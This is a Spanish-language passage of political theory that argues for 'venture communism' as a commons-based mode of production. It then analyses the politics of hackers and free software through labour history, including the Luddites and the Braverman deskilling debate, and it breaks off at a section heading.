En lugar de poner el énfasis en la distribucion inmaterial de lo que es producido por los ejemplos actuales de la produccion de pares, podríamos notar que esa producción está caracterizada por productores independientes que emplean un acervo común de activos productivos. Esta mirada sobre la producción de pares no se limita categóricamente a los bienes inmateriales. Entendido de esta forma, el concepto de producción de pares, donde una red de pares aplican su labor a un acervo común para beneficio mutuo e individual, ciertamente resuena en las viejas propuestas de modos socialistas de producción, donde en una comunidad sin clases de trabajadores (“pares”) producen colaborativamente dentro de una sociedad sin propiedad (“basada en los comunes”). A diferencia de la definición inmaterial y no reciprocitaria. Esta formulación puede dar cuenta de insumos materiales, especialización del trabajo y medios de formación de capital y tambien se relaciona cercanamente a la topología de las redes de pares (P2P) de la cual se deriva el término. Esta definición también describe mejor la producción de software libre, Wikipedia y otros trabajos ofrecidos como ejemplos de producción de pares.

Aun más, esta formulación está mejor arraigada en la historia, como describen los ejemplos históricos de producción basada en comunes, como los terrenos pastoriles. Como la distribución de los activos producidos está tan en la raíz de la inequidad de riqueza y poder que perpetuan los sistemas explotadores, un modo de producción donde los activos productivos son apropiados en común se vuelve potencialmente revolucionario. Sin embargo, si esta forma de producción se encapsula en lo inmaterial, si puede ser categorizada como inmaterial por definición, entonces sus productores no podrán capturar el valor que generen. Ésta, vale la pena decirlo, es precisamente la razón por la que los profesores de leyes de la Ivy League y otras elites prefieren mantener esta limitación. No obstante, si podemos implementar formas de compartir independientemente un acervo común de activos materiales y por lo tanto expandir el alcance de los comunes para incluir bienes materiales tanto como inmateriales, entonces los productores que emplean estos activos en su producción pueden retener una mayor parte de su producto.

La producción de pares es distinta de otros modos de producción. Los trabajadores que emplean independientemente un acervo común de activos productivos es un modo diferente, distinto de los enfoques capitalistas y colectivistas. El modo de producción capitalista es explotador por naturaleza; su lógica fundamental es capturar la plusvalía del trabajo al negar el acceso independiente a los medios de producción. Sin embargo, los modos de producción colectivistas pueden ser explotadores también. Por ejemplo, en la producción cooperativa, en la que los productores emplean colectivamente los activos productivos poseídos en común, la distribución de éstos tiende a ser injusta entre diferentes cooperativas, permitiendo a unas explotar a otras. Puede decirse que las formas colectivistas a gran escala, como los estados socialistas o las grandes cooperativas diversificadas, eliminan el tipo de explotación que puede ocurrir entre cooperativas. Sin embargo, las capas de coordinación en expansión necesarias para administrar estas grandes organizaciones dan origen a una clase coordinadora, una nueva clase consistente en una élite tecno-administrativa que históricamente ha probado tener la capacidad de ser tan parasitaria y severa con los trabajadores como la clase capitalista.

Una comunidad de pares productores puede crecer sin desarrollar capas de coordinación porque se auto-organiza y produce independientemente y como tal, no necesita de capas administrativas además de las requeridas para proveer el acervo común de activos productivos. Así, la coordinación se limita a la asignación del común entre quienes deseen emplearlo. No es sorprendente que este tipo de producción haya aparecido y se haya desarrollado donde el patrimonio común es propiedad inmaterial, como el software libre, ya que los bajos costos de reproducción eliminan el problema de la asignación. Por lo tanto, lo que se necesita para que la producción de pares pueda incorporar bienes materiales a su patrimonio común es un sistema de asignación de activos materiales entre pares independientes, que imponga solamente una mínima carga de coordinación. El comunismo de riesgo es esta forma.

Comunismo de riesgo

El comunismo de riesgo provee una estructura para que los productores independientes compartan un patrimonio común de activos productivos, permitiendo que las formas de producción antes asociadas exclusivamente con la creación de valor inmaterial, como el software libre, se extiendan a la esfera material. Parte del aparato que permitió a la comunidad del software libre crecer y expandirse fue la creación del copyleft, un tipo de licencia que permite la re-utilización del software que cubre, mientras las obras derivadas también se licencian bajo los mismos términos. Al publicar el software bajo tales licencias, la obra se convierte en patrimonio colectivo de todos los desarrolladores de software libre.

La innovación principal del copyleft fue el de volver el sistema de copyright contra sí mismo. El vehículo para establecer control con el copyright es la licencia bajo la cual se publica una obra, que establece los términos en los cuales se permite a otros usar el material con copyright. El copyleft secuestra efectivamente el aparato existente que refuerza el privilegio sobre los activos intelectuales, usando la autoridad concedida por la licencia de copyright para garantizar el acceso a todos y requerir que esta libertad se mantenga. Esto es consistente con las leyes de copyright y depende de ellas, porque sin copyright ni las instituciones que lo protegen, no podría haber copyleft.

El comunismo de riesgo requiere que esta misma libertad se extienda a los activos productivos materiales. El vehículo para establecer control sobre los activos productivos es la compañía. El comunismo de riesgo se basa entonces en una forma corporativa: la comuna de riesgo. Emplear una comuna de riesgo para compartir propiedad material secuestra el aparato existente que refuerza el privilegio para proteger un patrimonio común de activos productivos disponibles para el uso de productores independientes.

Legalmente, la comuna de riesgo es una compañía, muy similar a los fondos de capital de riesgo de la clase capitalista. No obstante, la comuna de riesgo posee propiedades distintas que la transforman en un vehículo efectivo para la lucha revolucionaria de los trabajadores. La comuna de riesgo posee todos los activos productivos que hacen al patrimonio común empleado por una red diversa y distribuida geográficamente de pares productores colectivos e independientes. La comuna de riesgo no coordina la producción; una comunidad de pares productores produce de acuerdo a sus propias necesidades y deseos. El rol de la comuna es administrar el patrimonio común, haciendo que la propiedad, como el alojamiento y las herramientas requeridas, estén disponibles para los pares productores.

La comuna de riesgo es la federación de colectivos de trabajadores y de trabajadores individuales y es en sí misma propiedad de cada uno de ellos, donde cada miembro posee sólo una acción. En el caso de los trabajadores que trabajen en un colectivo o cooperativa, la propiedad se posee individualmente, por cada persona que forme ese colectivo o cooperativa. La propiedad en una comuna de riesgo sólo puede ser adquirida por contribuciones de trabajo, no de propiedad. Sólo mediante el trabajo se gana una acción de la comuna, no por la contribución de tierra, capital o dinero; sólo de trabajo. La propiedad siempre se posee en común por todos los miembros de la comuna y la comuna de riesgo es poseída en partes iguales por todos sus miembros. Así, cada miembro no podría nunca acumular una parte desproporcionada de lo recaudado por la propiedad. La propiedad no puede concentrarse en pocas manos.

La función de la comuna de riesgo es adquirir los activos materiales que sus miembros necesitan para vivir y trabajar, como el equipamiento y las herramientas y asignarlas a esos miembros. La comuna adquiere estos bienes cuando uno de los miembros lo requiere. Los miembros interesados en utilizar esa propiedad ofrecen un acuerdo de renta a la comuna, dando los términos que deseen para tomar posesión de los bienes. La comuna emite una serie de bonos para juntar los fondos necesarios para la adquisición, que entonces se vuelve colateral a los bonistas. El acuerdo de renta se ofrece como una garantía de que los fondos estarán disponibles para amortizar los bonos.

Si esta garantía no se cumple, la propiedad puede liquidarse a favor de los bonistas. Esta serie de bonos se venden en una subasta pública. Si la venta se realiza, la comuna adquiere la propiedad y el acuerdo de renta se ejecuta transfiriendo la posesión al arrendador. La propiedad retorna a la comuna en cuanto los arrendadores dejen de necesitarla o sean incapaces de cumplir con los términos acordados, momento en el que la comuna lo ofrece otra vez en subasta a sus miembros, quienes a su vez ofertan por términos de renta nuevos. Si no existiera demanda por el activo, se liquida. Después de que los bonos que fueron emitidos para adquirir un activo se cancelan completamente, se vuelve propiedad de la comuna.

El ingreso restante de la renta que la propiedad gana se divide en partes iguales entre todos los miembros de la comuna y se les paga. Las ganancias de la liquidación de la propiedad se dividen del mismo modo. Dado que la renta recolectada por la renta de la propiedad se divide igualmente entre los miembros de la comuna, aquellos miembros que pagan renta por una propiedad recibirán igual monto de vuelta, esencialmente usan una parte igual de la propiedad colectiva gratis. Lo que pagan en renta por la propiedad es igual a la renta que reciben como miembros de la comuna. Los miembros que alquilan por sobre su parte per-cápita de la propiedad colectiva pagarán más y presumiblemente elegirán pagar porque están empleando la propiedad como un activo productivo y por lo tanto, ganando lo suficiente para pagar.

En cambio, los miembros que utilicen menos que su parte per-cápita reciben más en pago de lo que pagan en renta, es decir se les premia por no acumular propiedad. Las actividades principales de la comuna de riesgo: administrar bonos y acuerdos de renta, no imponen un gran nivel de coordinación y como las redes informáticas que administran la asignación de bienes inmateriales, son actividades muy bien dispuestas para la automatización computarizada. Podrían existir muchas comunas de riesgo y comunidades más estables y sostenibles de productores basados en los comunes.

Cualquier cambio que puede producir una sociedad más equitativa depende de un cambio previo en el modo de producción que incrementa la parte de la riqueza retenida por los trabajadores. El cambio en el modo de producción debe ocurrir primero. Este cambio no puede alcanzarse políticamente, por voto, lobby, militancia o violencia revolucionaria. No mientras los dueños de la propiedad tengan más riqueza para usar en prevenir cualquier cambio financiando a sus propios candidatos, lobbistas, militantes y en última instancia, desarrollando una mayor capacidad para la violencia contrarrevolucionaria. La sociedad no puede cambiarse por una huelga, no mientras los dueños de la propiedad tengan más riqueza acumulada para sostenerse durante las interrupciones de la producción. Ni siquiera la negociación colectiva puede funcionar, dado que como los dueños de la propiedad poseen el producto, establecen su precio y por lo tanto cualquier ganancia en salarios se pierde en el aumento de precios.

El comunismo de riesgo no debe entenderse como una propuesta para una nueva forma de sociedad. Es una forma organizacional para la lucha social. Las comunas de riesgo no intentan reemplazar los sindicatos, los partidos políticos, ONGs ni otros vehículos potenciales para el conflicto de clase. Sino, complementarlos para inclinar la balanza económica en favor de los representantes de los intereses de clase de los trabajadores. Sin el comunismo de riesgo, estas otras formas organizadas están forzadas a trabajar siempre en oposición a bolsillos mucho más profundos y por lo tanto condenadas a cooptación, fracaso y retroceso infinitos. La única forma es detener la aplicación de nuestro trabajo a la propiedad privada de los no-productores y en cambio formar un patrimonio común de activos productivos.

El comunismo de riesgo significa tomar el control de nuestro propio proceso productivo, reteniendo el producto completo de nuestro trabajo, formando nuestro propio capital y expandiéndonos hasta que hayamos acumulado colectivamente la riqueza suficiente para alcanzar una mayor influencia social de la que poseen aquellos que defienden la explotación. Este nuevo balance económico permite un cambio que es mucho más grande que los modestos objetivos del comunismo de riesgo. Una sociedad verdaderamente libre no tendrá necesidad del copyleft o del comunismo de riesgo; estas son solo prácticas con las que los trabajadores pueden unirse hacia la realización de su rol histórico en la construcción de una sociedad sin clases, una sociedad de iguales.

¡Trabajadores del mundo uníos! No tienen nada que perder salvo sus cadenas. Tienen un mundo por ganar.

Hackers GNUníos

Publicada el 03/04/2020 - 03/08/2021 por Anonymous Chile

La izquierda política y la política de los hackers

En este artículo se mirará el hacking desde la perspectiva del sindicalismo. El significado político del hacking informático ha intrigado a la vieja izquierda, aunque existen algunos vasos comunicantes entre el movimiento hacker y movimientos sociales más tradicionales. Los más notables de estos grupos dentro del underground informático son los autodenominados ‘hacktivistas’. Tratan de aplicar sus habilidades informáticas a una agenda política ya establecida, como el feminismo o el ecologismo (Jordan, 2002). Pero es más desafiante darle sentido a la agenda política del núcleo del movimiento hacker. De inmediato, uno se pregunta si el underground informático puede siquiera considerarse un movimiento social. Muchos hackers, tal vez la mayoría, dirían que este no es el caso. A lo más, la política es tenida como un punto secundario frente a la alegría de jugar con tecnología informática (Torvalds & Diamond, 2001). Aún así, de esta apasionada afirmación de las computadoras han crecido ideas con ramificaciones políticas. Por caso, hackers que de otra manera no se considerarían ‘políticos’ tienden a oponerse a las patentes del software y la vigilancia estatal de Internet, para mencionar sólo dos ejemplos. De hecho, estos puntos de vista están tan compartidos en el underground informático que parecen más sentido común que consignas políticas. Algunos temas, como las campañas contra la expansión de las leyes de propiedad intelectual y la defensa de la libertad de expresión, han sido agregadas a agendas políticas y son promovidas activamente por grupos de lobby hacker, dos ejemplos de esto son la Fundación del Software Libre (FSF) y la Fundación Frontera Electrónica (EFF). Estas organizaciones están claramente involucradas en política, aunque sostienen que estos intereses cortan por ejes diferentes de los de la división derecha-izquierda tradicional. Cuando los científicos sociales han analizado los supuestos que descansan detrás de las declaraciones públicas de estos grupos de lobby hacker han encontrado sin embargo una cercana afinidad con el liberalismo (Coleman, 2008).

Un par de escritores de izquierda han hecho un corte en el que no interpretan el hacking como una ideología liberal. Muy al contrario, creen que el movimiento hacker podría revitalizar las viejas luchas de la izquierda, no sólo por la libertad individual sino también en contra de la injusticia y la desigualdad. El más renombrado enterado que ha expresado tales opiniones sobre el hacking es Eben Moglen. Es profesor de leyes y fue por un largo tiempo una figura maestra en la Fundación del Software Libre (FSF). Moglen es además el autor del Manifiesto puntoComunista, donde predijo que el anarquismo del desarrollo de software reemplazará a las firmas capitalistas como el modo más eficiente de organizar la producción en el futuro (Moglen, 1999). El estudioso de los medios Richard Barbrook razonaba en forma similar cuando desbancaba el hype acerca de los ‘mercados libres en el ciberespacio’ creado en los ‘90. En su lugar presentó su propia visión de una economía anarquista del don de alta tecnología.1 El impulso a dar se genera automáticamente del hecho de que en Internet la gente tiene un interés propio en compartir información libremente antes que comercializarla en un mercado (Barbrook, 2002). Podría decirse que el surgimiento de Napster y generaciones posteriores de tecnologías de compartición de archivos probaría que Barbrook estaba en lo cierto. Aun más iconoclasta en su adopción de la retórica socialista es el filósofo esloveno Slavoj Zizek. Parafraseó el apoyo de Lenin a la electricidad diciendo, en tono de burla, que ’el socialismo es igual a libre acceso a Internet más todo el poder a los Soviets’ (Zizek, 2002). Por lo menos unos pocos comunistas de la vieja escuela están tomando esta idea con seriedad. Creen que la tecnología informática ha provisto el vínculo faltante que al fin podría hacer de una economía planificada una alternativa viable a la economía de mercado (Pollack, 1998).

Pero estas afirmaciones positivas del hacking y la tecnología informática probablemente sean opiniones minoritarias dentro de la izquierda tradicional. Hay una sospecha profundamente arraigada entre los intelectuales de izquierda hacia la tecnología informática y, por extensión, a sus más celosos usuarios, es decir los hackers. El origen de Internet dentro de instituciones del EEUU de la Guerra Fría es suficiente para desanimar a muchos pensadores progresistas (Edwards, 1996; Shiller, 1999). Hay que agregar a esto el hype alrededor de Internet a mediados de los ‘90. Dió rienda suelta al viejo dilema de la ’Edad de la Información’. Esta noción data de los ’50 y proviene de sociólogos conservadores estadounidenses que se propusieron desaprobar la relevancia y continuidad de los conflictos de clase. Al anunciar el fin de la sociedad industrial, buscaban probar que las tensiones entre clases se habían disuelto y la lucha ideológica entre liberalismo y socialismo se estaba volviendo obsoleta. En consecuencia, los académicos con tendencias de izquierda protestaron contra las nociones acerca del surgimiento de la Edad de la Información e insistieron en la existencia y continuidad del industrialismo, capitalismo y conflicto de clases (Webster, 2002). Para probar este punto les basta con llamar atención sobre las condiciones inhumanas bajo las que la electrónica informática es manufacturada en zonas de exportación de países del tercer mundo (Sussman & Lent, 1998). Un informe de 2008 ha documentado cómo en China chicas de 16 años de edad trabajan de doce a quince horas diarias, seis o siete días a la semana, y apenas ganan para vivir (Weed, 2008). Estos descubrimientos resuenan junto a la circunstancia histórica de que las tarjetas perforadas, maquinaria de control numérico, mainframes y otros embriones de computadoras modernas fueron instrumental para volver redundantes a los obreros y degradar sus calificaciones laborales en el momento de la producción (Braverman, 1974; Kraft, 1977).

Ahora, habiendo delineado brevemente la relación confusa entre la izquierda tradicional y el empuje político de los hackers, este artículo procederá a examinar la importancia política de estos últimos a la luz de un viejo debate acerca de la maquinaria fabril y el trabajo asalariado. El Debate Braverman, como es conocido según el autor que inició la controversia, se retrotrae a los ‘70. Harry Braverman publicó un libro en el que argumentaba que la descalificación del trabajo era una cualidad inherente al capitalismo. La razón era que los gerentes tratan de independizarse de los obreros altamente calificados para mantener bajos salarios y debilitar políticamente a los sindicatos. Braverman encontró apoyo a su hipótesis en los escritos de los pioneros de la filosofía gerencial. La figura pivote entre ellos, Winston Taylor, fue el fundamento de lo que se conocería como ’gerenciamiento científico’ o ‘taylorismo’. Una idea central del gerenciamiento científico es que la línea de producción debe reestructurarse de manera que las tareas puedan realizarse mediante rutinas simples que requieran un mínimo de calificación de los empleados. Taylor argumentó que esto podía lograrse con la introducción de maquinaria fabril. Braverman mostró cómo esta estrategia se estaba desplegando en la industria pesada a mediados del siglo XX.

Este punto de vista puede servir como lente con la que mirar el significado político de la maquinaria informática y el hacking de esta. La novedad de este argumento es que el análisis de los hackers está formulado desde una perspectiva orientada a la producción, en oposición a la perspectiva de los derechos del consumidor. Se argumentará que el surgimiento del Software Libre y Abierto (FOSS) puede trazarse hasta el conflicto industrial entre gerentes y trabajadores. Además, la similaridad entre la lucha de los trabajadores contra la maquinaria fabril y la lucha del movimiento hacker contra el software propietario va a ser puesta en relieve. El libre acceso al código fuente, preocupación clave de los hackers, contradice el sistema fabril y la lógica del gerenciamiento científico en la programación informática (Hannemyr, 1999). Aunque la situación de los programadores comparada con la de los obreros es muy diferente en muchos aspectos, el artículo muestra que ambos grupos están preocupados en la meta de preservar sus calificaciones y la autonomía obrera frente al rápido cambio tecnológico. La demanda de los hackers de que el código fuente debe ser libremente accesible puede interpretarse como parte de una estrategia orientada a preservar el saber-cómo de los programadores y su control sobre las herramientas de su oficio.

La máquina en el trabajo

Los sentimientos ambivalentes de entusiasmo y miedo que a menudo evoca la tecnología informática entre la gente tienen un precedente histórico. En el amanecer de la revolución industrial, se debatió fuertemente en todos los segmentos de la sociedad qué efecto tendría la mecanización sobre el ser humano, tanto social como espiritualmente (Berg, 1980). Incluso algunos de los adelantados de la teoría económica liberal, como David Ricardo, admitieron que la clase trabajadora tenía buenas razones para resentir de la maquinaria fabril (Riccardo, 1821). La miseria que cayó sobre los trabajadores que estaban subyugados a la maquinaria y la disciplina fabril fue vívidamente descripta por James Kay, un reformista social que trabajó como doctor en las villas:

Mientras la máquina anda la gente debe trabajar –-hombres, mujeres y niños están uncidos juntos con hierro y vapor. La máquina animal –-frágil en el mejor de los casos, sujeta a mil fuentes de sufrimiento–- está encadenada a la máquina de hierro, que no conoce sufrimiento ni fatiga.

(Kay, 1832)

Escritores sobre el gerenciamiento tempranos como Andrew Ure y Charles Babbage dieron la bienvenida a esta oportunidad y aconsejaron a los dueños de las fábricas sobre cómo diseñar maquinaria para mantener a los obreros dóciles e industriosos (Babbage, 1971; Ure, 1835). Sus testimonios informaron el análisis del capitalismo de Karl Marx, quien denunció la maquinaria fabril como el ‘modo material de existencia del capital’. Pero él también cualificó su crítica contra la tecnología agregando que: “Tomó tiempo y experiencia para que los trabajadores aprendieran a distinguir la maquinaria de su empleo por el capital, y en consecuencia a transferir sus ataques de los instrumentos materiales de producción a la formación social que utiliza esos instrumentos.” (Marx, 1976) Así Marx renunció a la estrategia de rompimiento de máquinas que fue el sello de los Luditas. Los Luditas consistían en peinadores, tejedores y artesanos que sintieron que su oficio era amenazado por la introducción de nuevos telares y una subsecuente reorganización de la industria textil. Se hicieron ataques nocturnos para destruir molinos de lana y marcos de tejido de los que los ‘maestros tejedores’ eran dueños. Estas actividades alcanzaron su punto cúlmine en 1811-1813 y una vez la corona inglesa tuvo que desplegar 14.400 soldados en la región para poder aplastar las insurgencias nocturnas. Remarcablemente, fueron movilizados más soldados ingleses contra los Luditas de los que habían sido enviados a Portugal cuatro años antes para enfrentar al ejército de Napoleón (Sale, 1995). En su clásico reexamen del levantamiento Ludita, Eric Hobsbawm mostró que el rompimiento de máquinas no fue una resistencia fútil contra la tecnología y el progreso, como se hizo ver después. En su lugar la interpretó como un método de ‘negociación colectiva mediante el disturbio’. Romper la maquinaria era una opción, pero los obreros también pudieron presionar a sus empleadores prendiendo fuego los lugares de trabajo o enviando amenazas anónimas. Hobsbawm concluye que, a juzgar por la habilidad de los trabajadores de preservar sus salarios y condiciones laborales, tuvieron un éxito moderado (Hobsbawm, 1952).

La lectura equivocada de la rebelión Ludita como alocada, irresponsable y, más importante, sin relación alguna con la política, se asemeja al retrato de los hackers que se hace en los medios de noticias actuales. Andrew Ross protestó contra la imagen del hacker como un criminal menor, un bromista juvenil o, alternativamente, un yuppie de la Era de la Información. Hace hincapié en que el sabotaje espontáneo hecho por empleados contribuye la mayor parte de tiempo muerto en las oficinas. Estos ataques a menudo no son reportados ya que los gerentes prefieren culpar a adversarios externos. Con esta observación en mente, sugiere una definición de hacking más amplia:

Mientras un pequeño número de usuarios de computadoras se categorizaría a sí mismo como ‘hacker’, existen razones de peso para extender la definición restringida de hacking por debajo y a través de la jerarquía de analistas de sistemas, diseñadores, programadores y operadores para incluir a todos los trabajadores de alta tecnología –sin importar cuán inexpertos– que puedan interrumpir, molestar y redirigir el suave flujo de comunicaciones estructuradas que dicta su posición en las redes sociales de intercambio y determina el paso de su agenda de trabajo.

(Ross, 1991)

La sospecha de Andrew Ross es confirmada por estudios conducidos por organizaciones de empleadores. Que el personal provoque la falla del equipamiento informático de sus empleadores es el escenario más común, más costoso y más temido por las firmas que la intrusión de usuarios informáticos externos. De acuerdo a una encuesta realizada en 1998 por la Iniciativa por la Seguridad Informática en conjunto con el FBI, el costo medio de un ataque informático exitoso en los EEUU por un usuario externo es de US$56.000. En comparación, el costo medio de actos maliciosos hechos por usuarios internos (es decir, empleados) se estimó en US$2,7 millones (Shell & Dodge, 2002). La afición de los empleados por atacar los sistemas informáticos de sus empleadores subraya el rol de la computarización en la transformación de las condiciones de trabajo de los trabajadores de cuello blanco. La comparación de Ross con el sabotaje seguramente despertará algunas objeciones entre los hackers ‘reales’. Aquellos en el movimiento hacker que quieren adecuarse a la definición tratan de contrarrestar el estereotipo negativo de los hackers que hacen los medios al diferenciar entre hackers originales y los así llamados crackers. El primer nombre está reservado a usos creativos que contribuyen a proyectos de software socialmente útiles. Las connotaciones negativas del crimen informático están reservadas para el último grupo.

Estos esfuerzos por mejorar las relaciones públicas de los hackers meramente subrayan el paralelo histórico con la militancia laboral sugerido arriba. El movimiento sindicalista también ha rescrito su propia historia para que el sabotaje, las huelgas ilegales y los actos de violencia queden fuera de la foto. En efecto, los sindicatos han tenido bastante éxito en formalizar el conflicto entre trabajo y capital como un problema de negociación institucionalizada. No obstante, puede decirse que la negociación colectiva del trabajo todavía descansa sobre la amenaza velada del sabotaje, las huelgas y los disturbios (Brown, 1977). De la misma manera, entiendo la distinción entre hackers y crackers como una construcción discursiva que no retrata certeramente las raíces históricas ni el solapamiento actual de esta subcultura. En cambio, busca redefinir el significado de hacking y dirigirlo en una dirección particular. A pesar del éxito de esta retórica, la liberación de warez, la rotura de cifrados, y el crackeo de servidores corporativos juegan sin embargo un papel en la lucha más amplia por mantener la información libre.

Habiendo dicho esto, el lector estaría en lo correcto al objetar que la motivación de los Luditas y trabajadores para rechazar la maquinaria fabril y de oficina es muy diferente de la motivación de los hackers que luchan contra el software propietario. Para el último grupo, las computadoras se revelan como bienes de consumo y fuentes de estímulo. Podría decirse que su relación con la tecnología es de pasión más que de hostilidad. Aún cuando los hackers (crackers) sabotean servidores corporativos, este es un acto de alegría. Los trabajadores de oficina descontentos podrían obtener placer al destruir la computadora de su empleador, pero todavía es significativo decir que su acto nace del resentimiento contra su situación. Esta diferencia en motivación, sin embargo, no descarta la posibilidad de que los hackers compartan terreno con los antiguos rompedores de máquinas. Ambos están atrapados en un combate luchado en el terreno del desarrollo tecnológico. Incluso podría ser que la apasionada afirmación de la tecnología hecha por los hackers ofrezca una línea de ataque aún más subversiva, en comparación a, por ejemplo, la insurgencia Ludita. Aunque es incorrecto decir que los Luditas estaban en contra de la tecnología per se, es verdad que defendían una tecnología desactualizada contra la nueva del sistema fabril. Así es que parece que su causa estaba perdida antes de empezar. Los hackers, en contraste, tienen una tecnología propia sobre la que trabajar. Pueden declarar plausiblemente que su modo de escribir código es más avanzado que el ‘modelo fabril’ de desarrollo de software propietario.

Descalificación de obreros, recalificación de usuarios

Es una dialéctica extraña la que llevó a la situación actual en la que los hackers recuperan tecnología informática de las compañías e instituciones gubernamentales. Las pistas de cómo se llegó a esta situación pueden encontrarse en lo que se llamó el Debate Braverman. La controversia tuvo lugar contra el telón de la idea acerca de la llegada de una era post-industrial (Bell, 1973). Dos décadas después, la misma idea fue reempaquetada como ‘el surgimiento de la Era de la Información’ o la ‘Sociedad en Red’. Esta noción ha tenido muchos tonos pero invariablemente pinta un futuro brillante donde el capitalismo avanzará más allá del conflicto de clases y el trabajo monótono. Crucialmente, esta transición no fue traída a través de la lucha social sino que se debe exclusivamente a la trayectoria interna del desarrollo tecnológico. Harry Braverman apuntó a uno de sus supuestos principales, la de que las capacidades de los trabajadores se modernizarían cuando los trabajos de obrero fueran reemplazados por trabajos de cuello blanco. Insistió en que la lógica del capital es la de descalificar la fuerza de trabajo, sin tener en cuenta si se emplea en una fábrica o en una oficina. En lugar de una modernización general de calificaciones en la sociedad, predijo que el crecimiento de la así llamada ‘economía del servicio’ pronto resultaría en que los trabajadores de cuello blanco confronten la rutinización y descalificación así como la que obreros fabriles habían pasado antes.

Por lejos lo más importante en la producción moderna es la división de procesos complejos en tareas simples que son realizadas por trabajadores cuyo conocimiento es virtualmente nulo, cuyo así llamado entrenamiento es breve, y que entonces pueden ser tratados como partes intercambiables.

(Braverman, 1998a)

Su afirmación fue rebatida por los sociólogos industriales. Reconocían que la descalificación del trabajo está presente en industrias maduras, pero argumentaban que esta tendencia se contrabalanceaba por el establecimiento de nuevos puestos de trabajo con mayores calificaciones en otros lugares de la economía. A primera vista, la emergencia de la profesión de programador pareció haber probado que sus críticos tenían razón. Uno de ellos, Stephen Wood, reprochó a Braverman por idealizar al trabajador artesanal del siglo XIX. Wood señaló la difusión de la alfabetización para probar que las calificaciones también habían aumentado en la sociedad moderna (Wood, 1982). Su comentario es intrigante ya que trae una sutileza que se perdió en el calor del intercambio. No es la descalificación per se el objetivo del capital, sino el hacer reemplazables a los trabajadores. Cuando las tareas y cualificaciones se estandarizan, el trabajo será barato y falto de fuerza política. Desde este punto de vista, no importa realmente si las calificaciones de los trabajadores se nivelan en un equilibrio más bajo o más alto. La alfabetización universal es un ejemplo de lo último.

En este sentido puede decirse que la alfabetización es análoga en el presente a las campañas por la alfabetización informática que llaman a cerrar ‘la brecha digital’. En un sentido trivial, las calificaciones han aumentado en la sociedad cuando más gente sabe cómo usar computadoras. Uno puede sospechar que un fuerte ímpetu para esto es, sin embargo, que la alfabetización digital reduce una mayor inercia en el esquema de ‘aprendizaje de por vida’, esto es, el tiempo que toma a los humanos aprender nuevas habilidades. Una vez que los trabajadores adquieren habilidades básicas para navegar en un ambiente digital, toma menos esfuerzo aprender una nueva ocupación cuando su oficio anterior se vuelve redundante. Esta interpretación de alguna manera cínica de la alfabetización informática puede ilustrarse con una referencia a la industria de la imprenta. Los oficios gráficos tradicionales toman muchos años para dominarse y requieren grandes y costosas instalaciones. La militancia sindical que caracterizó la industria de la imprenta se fundaba sobre este monopolio del conocimiento por parte de los trabajadores. La introducción de procesos informáticos fue decisiva para romper la fuerza de los trabajadores gráficos (Zimbalist, 1979). Las computadoras personales pueden verse como una extensión de este desarrollo. La mediación por el software permite que la simple capacidad de navegar una interfaz gráfica se convierta en múltiples capacidades. Con una computadora corriendo GNU/Linux y Scribus, por ejemplo, el usuario puede comandar el lenguaje de máquina de la computadora e imitar los oficios de la imprenta y la tipografía. Se requiere muy poco entrenamiento para usar estos programas, comparado al tiempo que le toma a un trabajador gráfico dominar su oficio. Esto sugiere que la alfabetización informática reduce la inercia del aprendizaje humano y vuelve las calificaciones de los trabajadores más intercambiables. Los escritores liberales interpretan este desarrollo como un ejemplo del crecimiento lineal del aprendizaje y la educación correspondiente a la llamada ‘sociedad del conocimiento’. Desde la perspectiva de la teoría del proceso laboral, muy al contrario, el mismo desarrollo es visto como una degradación de las capacidades de los trabajadores y en última instancia apunta a debilitar la posición negociadora de los sindicatos.

El clásico estudio de David Noble sobre la introducción de maquinaria de control numérico en la industria pesada a mediados del siglo XX provee el vínculo faltante entre el argumento de Braverman sobre la descalificación y la discusión actual sobre computadoras y hackers. Una cosa sobre la que su estudio arroja luz es cómo la universalidad de la herramienta informática estaba pensada para trabajar en ventaja de los gerentes. Su esperanza era la de debilitar la posición de los maquinistas calificados. La maquinaria de propósito especial había fallado en reemplazar a estos obreros, ya que aún tenían que tomarse iniciativas en la línea de producción para integrar los estadios separados de la producción especializada. En contraste, las máquinas de propósito general simulaban la versatilidad de los seres humanos, por lo que estaban mejor capacitadas para reemplazarlos (Noble, 1984). Esta conexión histórica es importante de enfatizar porque ahora es un lugar común que la universalidad de las herramientas informáticas se asuma como una cualidad inherente de la tecnología de la información en sí misma. De ahí que la trayectoria hacia herramientas universales se haya desprendido de la lucha y se atribuya en cambio a la gracia del desarrollo tecnológico.

Decir eso no nos obliga a condenar la tendencia a un nivelamiento de las calificaciones productivas y el crecimiento de herramientas universales como las computadoras. Al contrario, en fuerte contraste con el retrato negativo de Harry Braverman como un neo-Ludita, Braverman reconoce que la unificación de la fuerza de trabajo causada por la maquinaria acarreó un potencial positivo.

El proceso re-unificado en el que la ejecución de todos los pasos es construida en el mecanismo de trabajo de una sola máquina parecería ahora volverlo adecuado a un colectivo de productores asociados, ninguno de los cuales necesita gastar toda su vida en una sola función cualquiera y donde todos pueden participar en la ingeniería, diseño, mejora, reparación y operación de estas máquinas aún más productivas.

(Braverman, 1998b)

Con una herramienta universal, la computadora, y la casi universal calificación de usarla, el público puede involucrarse en cualquier cantidad y tipo de actividades productivas. Es desde este ángulo que podemos empezar a dar sentido a la tendencia actual de ‘empoderamiento del usuario’. En otras palabras: El desplazamiento del trabajo organizado de los baluartes del aparato de producción capitalista, a través de la combinación de descalificación y recalificación, ha preparado el terreno para esquemas de innovación asistidos por computadoras y centrados en el usuario. Porque programas como Inkscape y Scribus, y sus equivalentes propietarios, están substituyendo formas tradicionales de imprenta y tipografía, una multitud de gente puede producir pósteres y panfletos, instantáneamente aplicables a sus luchas locales. Las compañías tienen más difícil el control de la actividad productiva ahora que cuando los instrumentos de trabajo estaban concentrados en las manos de unos pocos, aunque relativamente poderosos, empleados. Lo que es cierto para el diseño gráfico se aplica igualmente a la escritura de código de software y el desarrollo de la tecnología informática. Aquí la cara de Jano del software se pone en primer plano: con la misma flexibilidad y precisión con la que el código de software puede diseñarse para controlar trabajadores subordinados, esta misma facilidad permite a muchos más tomar parte en el proceso de escribirlo. Aunque formas embrionarias de tecnología informática, como la maquinaria de control numérico, fueron introducidas en los lugares de trabajo por los gerentes para independizarlos de trabajadores sindicalizados y calificados; como un efecto lateral, la tecnología informática ha contribuido al establecimiento de procesos productivos centrados en el usuario, parcialmente independientes de gerentes y fábricas. La comunidad de desarrollo de software libre puede tomarse como ilustración de esto.

El software libre como una estrategia sindical

